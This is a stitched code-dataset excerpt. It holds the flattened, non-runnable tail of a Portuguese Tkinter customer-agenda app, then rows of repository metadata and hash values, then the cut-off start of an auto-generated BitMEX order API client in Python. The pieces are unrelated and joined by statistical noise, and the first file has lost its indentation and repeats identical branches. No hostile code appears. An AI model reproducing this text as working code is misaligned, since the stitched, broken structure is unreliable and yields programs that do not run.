##print("EMAIL: ", email)
elif i == '¹' and endereco == '':
if aux == '':
endereco = "1 - Rio de Janeiro - RJ"
elif aux == ' ':
endereco = "2 - Rio de Janeiro - RJ"
elif aux == ' ':
endereco = "3 - Rio de Janeiro - RJ"
elif aux == ' ':
endereco = "4 - Rio de Janeiro - RJ"
elif aux == ' ':
endereco = "tab -Rio de Janeiro - RJ"
else:
endereco = aux
#endereco = aux
##print("Endereço: ", aux)
##print("Endereço: ", endereco)
aux = ''
elif i == '¹' and self.data_aux == '':
if aux == '':
self.data_aux = ('00/00/0000')
else:
self.data_aux = aux
#data = aux
##print(" Data: ", self.data_aux)
aux = ''
elif i == '¹' and self.hora_aux == '':
if aux == '':
self.hora_aux = ('00:00')
else:
self.hora_aux = aux
#hora = aux
##print("Hora: ",self.hora_aux)
aux = ''
elif i == '¹' and comentarios == '':
if aux == '':
comentarios = ('1 -Vazio')
elif aux == ' ':
comentarios = ('2 - Vazio')
elif aux == ' ':
comentarios = ('2 - Vazio')
elif aux == ' ':
comentarios = ('2 - Vazio')
elif aux == ' ':
comentarios = ('2 - Vazio')
elif aux == ' ':
comentarios = ('2 - Vazio')
elif aux == ' ':
comentarios = ('2 - Vazio')
else:
comentarios = aux
##print("Comentarios: ", comentarios)
aux = ''
elif i == '²':
                    break
else:
aux += i
if self.data_aux != '':
self.frame_tabela = Frame(self.frame_auxiliar_scrollbar, width = 10, height = 5, relief = RIDGE, borderwidth = '3', bg = 'black')
self.frame_tabela.pack(pady = 10)
self.label_teste = Button(self.frame_tabela, text="Nome: "+ nome, bg = 'black', fg = 'white', font = ('Franklin Gothic Medium', 12), relief = RIDGE, borderwidth = '1', width = 51, height = 1, command = partial(mostrar_foto, nome ))
self.label_teste.pack()
self.label_teste = Label(self.frame_tabela, text="Telefone: "+ telefone, bg = 'black', fg = 'white', font = ('Franklin Gothic Medium', 12), relief = RIDGE, borderwidth = '1', width = 51, height = 1, justify = 'left', anchor = 'w', )
self.label_teste.pack()
self.label_teste = Label(self.frame_tabela, text="Data de Nascimento: "+ data_de_nascimento, bg = 'black', fg = 'white', font = ('Franklin Gothic Medium', 12), relief = RIDGE, borderwidth = '1', width = 51, height = 1, justify = 'left', anchor = 'w')
self.label_teste.pack()
self.label_teste = Label(self.frame_tabela, text="Email: "+email, bg = 'black', fg = 'white', font = ('Franklin Gothic Medium', 12), relief = RIDGE, borderwidth = '1', width = 51, height = 1, justify = 'left', anchor = 'w')
self.label_teste.pack()
self.label_teste = Label(self.frame_tabela, text="Endereço: "+ endereco, bg = 'black', fg = 'white', font = ('Franklin Gothic Medium', 12), relief = RIDGE, borderwidth = '1', width = 51, height = 1, justify = 'left', anchor = 'w')
self.label_teste.pack()
self.label_teste = Label(self.frame_tabela, text="Data: "+ self.data_aux, bg = 'black', fg = 'white', font = ('Franklin Gothic Medium', 12), relief = RIDGE, borderwidth = '1', width = 51, height = 1, justify = 'left', anchor = 'w')
self.label_teste.pack()
self.label_teste = Label(self.frame_tabela, text="Hora: "+ self.hora_aux, bg = 'black', fg = 'white', font = ('Franklin Gothic Medium', 12), relief = RIDGE, borderwidth = '1', width = 51, height = 1, justify = 'left', anchor = 'w')
self.label_teste.pack()
self.label_teste = Label(self.frame_tabela, text="Comentario: "+ comentarios, bg = 'black', fg = 'white', font = ('Franklin Gothic Medium', 12), relief = RIDGE, borderwidth = '1', width = 51, height = 1, justify = 'left', anchor = 'w')
self.label_teste.pack()
def carregar_scrollbars(self, i):
self.my_canvas = Canvas(i, width = 480)
self.my_canvas.pack(side= LEFT, fill = BOTH)
self.my_scrollsbars = Scrollbar(i, orient = VERTICAL, command = self.my_canvas.yview)
self.my_scrollsbars.pack(side = LEFT, fill= Y)
self.my_canvas.configure( yscrollcommand = self.my_scrollsbars.set, bg = 'black')
self.my_canvas.bind('<Configure>', lambda e: self.my_canvas.configure(scrollregion = self.my_canvas.bbox("all") ))
self.frame_scrollbar = Frame(self.my_canvas)
self.my_canvas.create_window((0,0),window=self.frame_scrollbar, anchor = "nw")
        self.frame_auxiliar_scrollbar = Frame(self.frame_scrollbar, bg = 'black')#, relief = RIDGE, borderwidth = '3', width = 20, height = 6)# SPECIAL AUXILIARY FRAME FOR DELETING AND REBUILDING THE BUTTONS
self.frame_auxiliar_scrollbar.pack()
class abrir_janela_detalhada_mes(object):
def __init__(self, i, data):
self.data_recebida = data
self.carregar_scrollbars(i)
self.listar_financas(i)
def listar_financas(self, i):
def mostrar_foto(nome):
diretorio = "C:/sistema_loja-main/imagens_clientes/"+nome+".png"
imagem = cv2.imread(diretorio)
cv2.imshow("Original", imagem)
cv2.waitKey(0)
pass
x = dbclientes.clientes.keys() #¬ | ! £ ¢ §
#print("Lista: ",x)
for k in x:
##print('Nome:',k)
aux = ""
y = dbclientes.clientes[k.decode()].decode()
##print('Valor: ',y)
#self.data_aux = ''
#self.hora_aux = ''
nome = k.decode()
aux = ''
telefone = ''
data_de_nascimento=''
email=''
endereco = ''
self.data_aux=''
self.hora_aux=''
comentarios =''
for i in y:
##print("Correndo o data base - ",i)
if i == '¹' and telefone == '':
if aux == '':
telefone = ('021')
else:
telefone = aux
#self.entry_tel.delete(0,END)
#self.entry_tel.insert(END, telefone)
##print("Telefone: ",telefone)
aux = ''
elif i == '¹' and data_de_nascimento == '':
if aux == '':
data_de_nascimento = ('00/00/0000')
elif aux == ' ':
data_de_nascimento = ('00/00/0000')
elif aux == ' ':
data_de_nascimento = ('00/00/0000')
elif aux == ' ':
data_de_nascimento = ('00/00/0000')
elif aux == ' ':
data_de_nascimento = ('00/00/0000')
else:
data_de_nascimento = aux
#self.entry_nascimento.delete(0,END)
#self.entry_nascimento.insert(END, data_de_nascimento)
##print("data_de_nascimento: ", data_de_nascimento)
#data_de_nascimento = aux
##print(aux)
aux = ''
elif i == '¹' and email == '':
if aux == '':
email = "Vazio"
elif aux == ' ':
email = "Vazio"
elif email == ' ':
email = "Vazio"
elif email == " ":
email="Vazio"
else:
email = aux
#self.entry_email.delete(0,END)
#self.entry_email.insert(END, email)
aux = ''
##print("EMAIL: ", email)
elif i == '¹' and endereco == '':
if aux == '':
endereco = "1 - Rio de Janeiro - RJ"
elif aux == ' ':
endereco = "2 - Rio de Janeiro - RJ"
elif aux == ' ':
endereco = "3 - Rio de Janeiro - RJ"
elif aux == ' ':
endereco = "4 - Rio de Janeiro - RJ"
elif aux == ' ':
endereco = "tab -Rio de Janeiro - RJ"
else:
endereco = aux
#endereco = aux
##print("Endereço: ", aux)
##print("Endereço: ", endereco)
aux = ''
elif i == '¹' and self.data_aux == '':
if aux == '':
self.data_aux = ('00/00/0000')
else:
self.data_aux = aux
#data = aux
##print(" Data: ", self.data_aux)
aux = ''
elif i == '¹' and self.hora_aux == '':
if aux == '':
self.hora_aux = ('00:00')
else:
self.hora_aux = aux
#hora = aux
##print("Hora: ",self.hora_aux)
aux = ''
elif i == '¹' and comentarios == '':
if aux == '':
comentarios = ('1 -Vazio')
elif aux == ' ':
comentarios = ('2 - Vazio')
elif aux == ' ':
comentarios = ('2 - Vazio')
elif aux == ' ':
comentarios = ('2 - Vazio')
elif aux == ' ':
comentarios = ('2 - Vazio')
elif aux == ' ':
comentarios = ('2 - Vazio')
elif aux == ' ':
comentarios = ('2 - Vazio')
else:
comentarios = aux
##print("Comentarios: ", comentarios)
aux = ''
elif i == '²':
                    break
else:
aux += i
#print("Data do cliente marcado", self.data_aux)
#print("Data recebida do sistema",self.data_recebida)
a = self.data_aux[3::]
b = self.data_recebida[3::]
#print("Formato final data do cleinte",a)
#print("Formato final do sistema ",b)
if a == b :
self.frame_tabela = Frame(self.frame_auxiliar_scrollbar, width = 10, height = 5, relief = RIDGE, borderwidth = '3', bg = 'black')
self.frame_tabela.pack(pady = 10)
self.label_teste = Button(self.frame_tabela, text="Nome: "+ nome, bg = 'black', fg = 'white', font = ('Franklin Gothic Medium', 12), relief = RIDGE, borderwidth = '1', width = 51, height = 1, command = partial(mostrar_foto, nome ))
self.label_teste.pack()
self.label_teste = Label(self.frame_tabela, text="Telefone: "+ telefone, bg = 'black', fg = 'white', font = ('Franklin Gothic Medium', 12), relief = RIDGE, borderwidth = '1', width = 51, height = 1, justify = 'left', anchor = 'w', )
self.label_teste.pack()
self.label_teste = Label(self.frame_tabela, text="Data de Nascimento: "+ data_de_nascimento, bg = 'black', fg = 'white', font = ('Franklin Gothic Medium', 12), relief = RIDGE, borderwidth = '1', width = 51, height = 1, justify = 'left', anchor = 'w')
self.label_teste.pack()
self.label_teste = Label(self.frame_tabela, text="Email: "+email, bg = 'black', fg = 'white', font = ('Franklin Gothic Medium', 12), relief = RIDGE, borderwidth = '1', width = 51, height = 1, justify = 'left', anchor = 'w')
self.label_teste.pack()
self.label_teste = Label(self.frame_tabela, text="Endereço: "+ endereco, bg = 'black', fg = 'white', font = ('Franklin Gothic Medium', 12), relief = RIDGE, borderwidth = '1', width = 51, height = 1, justify = 'left', anchor = 'w')
self.label_teste.pack()
self.label_teste = Label(self.frame_tabela, text="Data: "+ self.data_aux, bg = 'black', fg = 'white', font = ('Franklin Gothic Medium', 12), relief = RIDGE, borderwidth = '1', width = 51, height = 1, justify = 'left', anchor = 'w')
self.label_teste.pack()
self.label_teste = Label(self.frame_tabela, text="Hora: "+ self.hora_aux, bg = 'black', fg = 'white', font = ('Franklin Gothic Medium', 12), relief = RIDGE, borderwidth = '1', width = 51, height = 1, justify = 'left', anchor = 'w')
self.label_teste.pack()
self.label_teste = Label(self.frame_tabela, text="Comentario: "+ comentarios, bg = 'black', fg = 'white', font = ('Franklin Gothic Medium', 12), relief = RIDGE, borderwidth = '1', width = 51, height = 1, justify = 'left', anchor = 'w')
self.label_teste.pack()
def carregar_scrollbars(self, i):
self.my_canvas = Canvas(i, width = 480)
self.my_canvas.pack(side= LEFT, fill = BOTH)
self.my_scrollsbars = Scrollbar(i, orient = VERTICAL, command = self.my_canvas.yview)
self.my_scrollsbars.pack(side = LEFT, fill= Y)
self.my_canvas.configure( yscrollcommand = self.my_scrollsbars.set, bg = 'black')
self.my_canvas.bind('<Configure>', lambda e: self.my_canvas.configure(scrollregion = self.my_canvas.bbox("all") ))
self.frame_scrollbar = Frame(self.my_canvas)
self.my_canvas.create_window((0,0),window=self.frame_scrollbar, anchor = "nw")
        self.frame_auxiliar_scrollbar = Frame(self.frame_scrollbar, bg = 'black')#, relief = RIDGE, borderwidth = '3', width = 20, height = 6)# SPECIAL AUXILIARY FRAME FOR DELETING AND REBUILDING THE BUTTONS
self.frame_auxiliar_scrollbar.pack()
def abrir_janela_detalhada_cl():
janela_detalhada = tk.Tk()
abrir_janela_detalhada(janela_detalhada)
janela_detalhada['bg'] = 'black'
janela_detalhada.title("Agenda Completa")
width = 500
height = 800
x = 850
y = 0
#TAKE THE WINDOW SIZE AND PUT IN GEOMETRY
##print(aux)
janela_detalhada.geometry(f'{width}x{height}+{x}+{y}')
#janela_detalhada.geometry(("600x700"))
janela_detalhada.wm_iconbitmap('imagens/lou.ico')
    janela_detalhada.mainloop()
def abrir_janela_detalhada_cl_mes(data):
janela_detalhada_mes = tk.Tk()
abrir_janela_detalhada_mes(janela_detalhada_mes, data)
janela_detalhada_mes['bg'] = 'black'
janela_detalhada_mes.title("Agenda Completa")
width = 500
height = 800
x = 850
y = 0
#TAKE THE WINDOW SIZE AND PUT IN GEOMETRY
##print(aux)
janela_detalhada_mes.geometry(f'{width}x{height}+{x}+{y}')
#janela_detalhada.geometry(("600x700"))
janela_detalhada_mes.wm_iconbitmap('imagens/lou.ico')
janela_detalhada_mes.mainloop()
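# --- Hypothetical usage sketch (not part of the original module) ---
# The helper functions above open the detail windows; the date argument follows
# the "dd/mm/yyyy" format used elsewhere in this file:
# abrir_janela_detalhada_cl()
# abrir_janela_detalhada_cl_mes("01/01/2022")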
| 36.334963
| 254
| 0.60292
| 1,927
| 14,861
| 4.518422
| 0.095485
| 0.033077
| 0.051453
| 0.034914
| 0.939015
| 0.917882
| 0.917882
| 0.908694
| 0.908694
| 0.908694
| 0
| 0.028289
| 0.23168
| 14,861
| 409
| 255
| 36.334963
| 0.733579
| 0.129937
| 0
| 0.891803
| 0
| 0
| 0.12865
| 0.009657
| 0
| 0
| 0
| 0
| 0
| 1
| 0.032787
| false
| 0.006557
| 0.02623
| 0
| 0.065574
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 7
| f701ffdb06c403bc4f6a1e71c86342279da88863
| 69,260
| py
| Python
| bitmex_swagger/api/order_api.py
| silencewwt/bitmex-swagger-client
| 01403685eeb12eb27d53a0310d3bc7541793aa0f
| ["MIT"] | 1
| 2018-08-04T15:05:43.000Z
| 2018-08-04T15:05:43.000Z
| bitmex_swagger/api/order_api.py
| silencewwt/bitmex-swagger
| 01403685eeb12eb27d53a0310d3bc7541793aa0f
| ["MIT"] | null | null | null
| bitmex_swagger/api/order_api.py
| silencewwt/bitmex-swagger
| 01403685eeb12eb27d53a0310d3bc7541793aa0f
| ["MIT"] | null | null | null
|
# coding: utf-8
"""
BitMEX API
## REST API for the BitMEX Trading Platform [View Changelog](/app/apiChangelog) ---- #### Getting Started Base URI: [https://www.bitmex.com/api/v1](/api/v1) ##### Fetching Data All REST endpoints are documented below. You can try out any query right from this interface. Most table queries accept `count`, `start`, and `reverse` params. Set `reverse=true` to get rows newest-first. Additional documentation regarding filters, timestamps, and authentication is available in [the main API documentation](/app/restAPI). *All* table data is available via the [Websocket](/app/wsAPI). We highly recommend using the socket if you want to have the quickest possible data without being subject to ratelimits. ##### Return Types By default, all data is returned as JSON. Send `?_format=csv` to get CSV data or `?_format=xml` to get XML data. ##### Trade Data Queries *This is only a small subset of what is available, to get you started.* Fill in the parameters and click the `Try it out!` button to try any of these queries. * [Pricing Data](#!/Quote/Quote_get) * [Trade Data](#!/Trade/Trade_get) * [OrderBook Data](#!/OrderBook/OrderBook_getL2) * [Settlement Data](#!/Settlement/Settlement_get) * [Exchange Statistics](#!/Stats/Stats_history) Every function of the BitMEX.com platform is exposed here and documented. Many more functions are available. ##### Swagger Specification [⇩ Download Swagger JSON](swagger.json) ---- ## All API Endpoints Click to expand a section. # noqa: E501
OpenAPI spec version: 1.2.0
Contact: support@bitmex.com
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import re # noqa: F401
# python 2 and python 3 compatibility library
import six
from bitmex_swagger.api_client import ApiClient
class OrderApi(object):
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
Ref: https://github.com/swagger-api/swagger-codegen
"""
def __init__(self, api_client=None):
if api_client is None:
api_client = ApiClient()
self.api_client = api_client
def order_amend(self, **kwargs): # noqa: E501
"""Amend the quantity or price of an open order. # noqa: E501
Send an `orderID` or `origClOrdID` to identify the order you wish to amend. Both order quantity and price can be amended. Only one `qty` field can be used to amend. Use the `leavesQty` field to specify how much of the order you wish to remain open. This can be useful if you want to adjust your position's delta by a certain amount, regardless of how much of the order has already filled. > A `leavesQty` can be used to make a \"Filled\" order live again, if it is received within 60 seconds of the fill. Use the `simpleOrderQty` and `simpleLeavesQty` fields to specify order size in Bitcoin, rather than contracts. These fields will round up to the nearest contract. Like order placement, amending can be done in bulk. Simply send a request to `PUT /api/v1/order/bulk` with a JSON body of the shape: `{\"orders\": [{...}, {...}]}`, each object containing the fields used in this endpoint. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.order_amend(async=True)
>>> result = thread.get()
:param async bool
:param str order_id: Order ID
:param str orig_cl_ord_id: Client Order ID. See POST /order.
:param str cl_ord_id: Optional new Client Order ID, requires `origClOrdID`.
:param float simple_order_qty: Optional order quantity in units of the underlying instrument (i.e. Bitcoin).
:param float order_qty: Optional order quantity in units of the instrument (i.e. contracts).
:param float simple_leaves_qty: Optional leaves quantity in units of the underlying instrument (i.e. Bitcoin). Useful for amending partially filled orders.
:param float leaves_qty: Optional leaves quantity in units of the instrument (i.e. contracts). Useful for amending partially filled orders.
:param float price: Optional limit price for 'Limit', 'StopLimit', and 'LimitIfTouched' orders.
:param float stop_px: Optional trigger price for 'Stop', 'StopLimit', 'MarketIfTouched', and 'LimitIfTouched' orders. Use a price below the current price for stop-sell orders and buy-if-touched orders.
:param float peg_offset_value: Optional trailing offset from the current price for 'Stop', 'StopLimit', 'MarketIfTouched', and 'LimitIfTouched' orders; use a negative offset for stop-sell orders and buy-if-touched orders. Optional offset from the peg price for 'Pegged' orders.
:param str text: Optional amend annotation. e.g. 'Adjust skew'.
:return: Order
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.order_amend_with_http_info(**kwargs) # noqa: E501
else:
(data) = self.order_amend_with_http_info(**kwargs) # noqa: E501
return data
def order_amend_with_http_info(self, **kwargs): # noqa: E501
"""Amend the quantity or price of an open order. # noqa: E501
Send an `orderID` or `origClOrdID` to identify the order you wish to amend. Both order quantity and price can be amended. Only one `qty` field can be used to amend. Use the `leavesQty` field to specify how much of the order you wish to remain open. This can be useful if you want to adjust your position's delta by a certain amount, regardless of how much of the order has already filled. > A `leavesQty` can be used to make a \"Filled\" order live again, if it is received within 60 seconds of the fill. Use the `simpleOrderQty` and `simpleLeavesQty` fields to specify order size in Bitcoin, rather than contracts. These fields will round up to the nearest contract. Like order placement, amending can be done in bulk. Simply send a request to `PUT /api/v1/order/bulk` with a JSON body of the shape: `{\"orders\": [{...}, {...}]}`, each object containing the fields used in this endpoint. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.order_amend_with_http_info(async=True)
>>> result = thread.get()
:param async bool
:param str order_id: Order ID
:param str orig_cl_ord_id: Client Order ID. See POST /order.
:param str cl_ord_id: Optional new Client Order ID, requires `origClOrdID`.
:param float simple_order_qty: Optional order quantity in units of the underlying instrument (i.e. Bitcoin).
:param float order_qty: Optional order quantity in units of the instrument (i.e. contracts).
:param float simple_leaves_qty: Optional leaves quantity in units of the underlying instrument (i.e. Bitcoin). Useful for amending partially filled orders.
:param float leaves_qty: Optional leaves quantity in units of the instrument (i.e. contracts). Useful for amending partially filled orders.
:param float price: Optional limit price for 'Limit', 'StopLimit', and 'LimitIfTouched' orders.
:param float stop_px: Optional trigger price for 'Stop', 'StopLimit', 'MarketIfTouched', and 'LimitIfTouched' orders. Use a price below the current price for stop-sell orders and buy-if-touched orders.
:param float peg_offset_value: Optional trailing offset from the current price for 'Stop', 'StopLimit', 'MarketIfTouched', and 'LimitIfTouched' orders; use a negative offset for stop-sell orders and buy-if-touched orders. Optional offset from the peg price for 'Pegged' orders.
:param str text: Optional amend annotation. e.g. 'Adjust skew'.
:return: Order
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['order_id', 'orig_cl_ord_id', 'cl_ord_id', 'simple_order_qty', 'order_qty', 'simple_leaves_qty', 'leaves_qty', 'price', 'stop_px', 'peg_offset_value', 'text'] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method order_amend" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
if 'order_id' in params:
form_params.append(('orderID', params['order_id'])) # noqa: E501
if 'orig_cl_ord_id' in params:
form_params.append(('origClOrdID', params['orig_cl_ord_id'])) # noqa: E501
if 'cl_ord_id' in params:
form_params.append(('clOrdID', params['cl_ord_id'])) # noqa: E501
if 'simple_order_qty' in params:
form_params.append(('simpleOrderQty', params['simple_order_qty'])) # noqa: E501
if 'order_qty' in params:
form_params.append(('orderQty', params['order_qty'])) # noqa: E501
if 'simple_leaves_qty' in params:
form_params.append(('simpleLeavesQty', params['simple_leaves_qty'])) # noqa: E501
if 'leaves_qty' in params:
form_params.append(('leavesQty', params['leaves_qty'])) # noqa: E501
if 'price' in params:
form_params.append(('price', params['price'])) # noqa: E501
if 'stop_px' in params:
form_params.append(('stopPx', params['stop_px'])) # noqa: E501
if 'peg_offset_value' in params:
form_params.append(('pegOffsetValue', params['peg_offset_value'])) # noqa: E501
if 'text' in params:
form_params.append(('text', params['text'])) # noqa: E501
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json', 'application/xml', 'text/xml', 'application/javascript', 'text/javascript']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json', 'application/x-www-form-urlencoded']) # noqa: E501
# Authentication setting
auth_settings = ['apiKey', 'apiNonce', 'apiSignature'] # noqa: E501
return self.api_client.call_api(
'/order', 'PUT',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Order', # noqa: E501
auth_settings=auth_settings,
async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
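    # Hypothetical usage sketch (assumes API credentials are already configured on
    # the underlying ApiClient; the identifier below is a placeholder):
    # api = OrderApi()
    # amended = api.order_amend(orig_cl_ord_id="my-order-1", price=6500.0)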
def order_amend_bulk(self, **kwargs): # noqa: E501
"""Amend multiple orders for the same symbol. # noqa: E501
Similar to POST /amend, but with multiple orders. `application/json` only. Ratelimited at 10%. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.order_amend_bulk(async=True)
>>> result = thread.get()
:param async bool
:param str orders: An array of orders.
:return: list[Order]
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.order_amend_bulk_with_http_info(**kwargs) # noqa: E501
else:
(data) = self.order_amend_bulk_with_http_info(**kwargs) # noqa: E501
return data
def order_amend_bulk_with_http_info(self, **kwargs): # noqa: E501
"""Amend multiple orders for the same symbol. # noqa: E501
Similar to POST /amend, but with multiple orders. `application/json` only. Ratelimited at 10%. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.order_amend_bulk_with_http_info(async=True)
>>> result = thread.get()
:param async bool
:param str orders: An array of orders.
:return: list[Order]
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['orders'] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method order_amend_bulk" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
if 'orders' in params:
form_params.append(('orders', params['orders'])) # noqa: E501
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json', 'application/xml', 'text/xml', 'application/javascript', 'text/javascript']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json', 'application/x-www-form-urlencoded']) # noqa: E501
# Authentication setting
auth_settings = ['apiKey', 'apiNonce', 'apiSignature'] # noqa: E501
return self.api_client.call_api(
'/order/bulk', 'PUT',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='list[Order]', # noqa: E501
auth_settings=auth_settings,
async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def order_cancel(self, **kwargs): # noqa: E501
"""Cancel order(s). Send multiple order IDs to cancel in bulk. # noqa: E501
Either an orderID or a clOrdID must be provided. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.order_cancel(async=True)
>>> result = thread.get()
:param async bool
:param str order_id: Order ID(s).
:param str cl_ord_id: Client Order ID(s). See POST /order.
:param str text: Optional cancellation annotation. e.g. 'Spread Exceeded'.
:return: list[Order]
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.order_cancel_with_http_info(**kwargs) # noqa: E501
else:
(data) = self.order_cancel_with_http_info(**kwargs) # noqa: E501
return data
def order_cancel_with_http_info(self, **kwargs): # noqa: E501
"""Cancel order(s). Send multiple order IDs to cancel in bulk. # noqa: E501
Either an orderID or a clOrdID must be provided. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.order_cancel_with_http_info(async=True)
>>> result = thread.get()
:param async bool
:param str order_id: Order ID(s).
:param str cl_ord_id: Client Order ID(s). See POST /order.
:param str text: Optional cancellation annotation. e.g. 'Spread Exceeded'.
:return: list[Order]
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['order_id', 'cl_ord_id', 'text'] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method order_cancel" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
if 'order_id' in params:
form_params.append(('orderID', params['order_id'])) # noqa: E501
if 'cl_ord_id' in params:
form_params.append(('clOrdID', params['cl_ord_id'])) # noqa: E501
if 'text' in params:
form_params.append(('text', params['text'])) # noqa: E501
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json', 'application/xml', 'text/xml', 'application/javascript', 'text/javascript']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json', 'application/x-www-form-urlencoded']) # noqa: E501
# Authentication setting
auth_settings = ['apiKey', 'apiNonce', 'apiSignature'] # noqa: E501
return self.api_client.call_api(
'/order', 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='list[Order]', # noqa: E501
auth_settings=auth_settings,
async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def order_cancel_all(self, **kwargs): # noqa: E501
"""Cancels all of your orders. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.order_cancel_all(async=True)
>>> result = thread.get()
:param async bool
:param str symbol: Optional symbol. If provided, only cancels orders for that symbol.
:param str filter: Optional filter for cancellation. Use to only cancel some orders, e.g. `{\"side\": \"Buy\"}`.
:param str text: Optional cancellation annotation. e.g. 'Spread Exceeded'
:return: list[Order]
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.order_cancel_all_with_http_info(**kwargs) # noqa: E501
else:
(data) = self.order_cancel_all_with_http_info(**kwargs) # noqa: E501
return data
def order_cancel_all_with_http_info(self, **kwargs): # noqa: E501
"""Cancels all of your orders. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.order_cancel_all_with_http_info(async=True)
>>> result = thread.get()
:param async bool
:param str symbol: Optional symbol. If provided, only cancels orders for that symbol.
:param str filter: Optional filter for cancellation. Use to only cancel some orders, e.g. `{\"side\": \"Buy\"}`.
:param str text: Optional cancellation annotation. e.g. 'Spread Exceeded'
:return: list[Order]
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['symbol', 'filter', 'text'] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method order_cancel_all" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
if 'symbol' in params:
form_params.append(('symbol', params['symbol'])) # noqa: E501
if 'filter' in params:
form_params.append(('filter', params['filter'])) # noqa: E501
if 'text' in params:
form_params.append(('text', params['text'])) # noqa: E501
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json', 'application/xml', 'text/xml', 'application/javascript', 'text/javascript']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json', 'application/x-www-form-urlencoded']) # noqa: E501
# Authentication setting
auth_settings = ['apiKey', 'apiNonce', 'apiSignature'] # noqa: E501
return self.api_client.call_api(
'/order/all', 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='list[Order]', # noqa: E501
auth_settings=auth_settings,
async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def order_cancel_all_after(self, timeout, **kwargs): # noqa: E501
"""Automatically cancel all your orders after a specified timeout. # noqa: E501
